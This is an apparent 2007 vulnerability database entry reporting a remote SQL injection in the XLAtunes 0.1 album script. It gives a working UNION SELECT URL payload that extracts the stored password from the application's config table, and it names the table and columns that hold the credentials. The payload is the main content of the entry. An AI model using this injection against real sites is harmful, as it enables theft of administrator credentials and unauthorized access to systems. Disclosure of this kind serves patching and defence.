XLAtunes 0.1 (album) Remote SQL Injection Vulnerability

2007-02-20T00:00:00
ID SECURITYVULNS:DOC:16123
Type securityvulns
Reporter Securityvulns
Modified 2007-02-20T00:00:00

Description

Critical Status:High

Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844

Greetz:all my friends

confkey->Password

confvalue->Username

Table:config

http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*